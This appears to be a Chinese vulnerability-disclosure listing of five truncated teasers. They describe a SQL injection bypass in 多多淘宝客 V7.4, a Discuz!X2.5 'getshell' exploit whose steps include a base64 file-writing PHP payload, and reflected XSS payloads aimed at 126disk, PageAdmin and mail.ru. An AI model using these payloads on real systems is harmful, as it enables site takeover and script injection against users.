-
多多淘宝客程序 V7.4 SQL注射绕过漏洞
问题位置:huangou.php ID过滤不严格$id =$_GET[''id''];$good=sel_sql(‘dhlist’,''id,name,pic,money,jifen,num,content,num&...
-
Discuz!X2.5 Release 20120407 Getshell 0day
影响版本有:20120407,beta,rc1.注册任意账户2.登陆用户,发表blog日志(注意是日志)3.添加图片,选择网络图片,地址:{${fputs(fopen(base64_decode(ZGVtby5waHA),w),base64...
-
126disk XSS 漏洞
响应大家的要求再发一个so.126disk.com/search?key=<script>alert('hacked by wing')</script>...
-
XX@mail.ru Xss 跨站 0day、XSS 跨站脚本
<STYLE> #mybody {height:rgb(’20′,20,’220);/**/height:rgb(‘)= !important height:EXPRESSION(...
-
PageAdmin XSS 漏洞
一站沦陷,全站皆沦XSS大家都不是很关注了??http://www.pageadmin.net/e/info/suc.aspx?code=%3Cscript%3Ealert('hacked%20by%20wing')%3C/script%3...
